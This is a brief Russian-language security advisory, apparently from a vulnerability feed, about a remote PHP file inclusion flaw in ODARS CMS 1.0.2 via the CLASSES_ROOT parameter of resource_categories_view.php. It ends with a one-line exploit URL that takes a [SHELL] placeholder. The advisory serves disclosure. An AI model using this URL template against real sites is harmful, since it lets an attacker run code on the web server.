Программа: ODARS CMS 1.0.2

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «CLASSES_ROOT» сценарием resource_categories_view.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.

Эксплоит:

http://localhost/path/src/browser/resource/categories/
resource_categories_view.php?CLASSES_ROOT=[SHELL]



Оставить мнение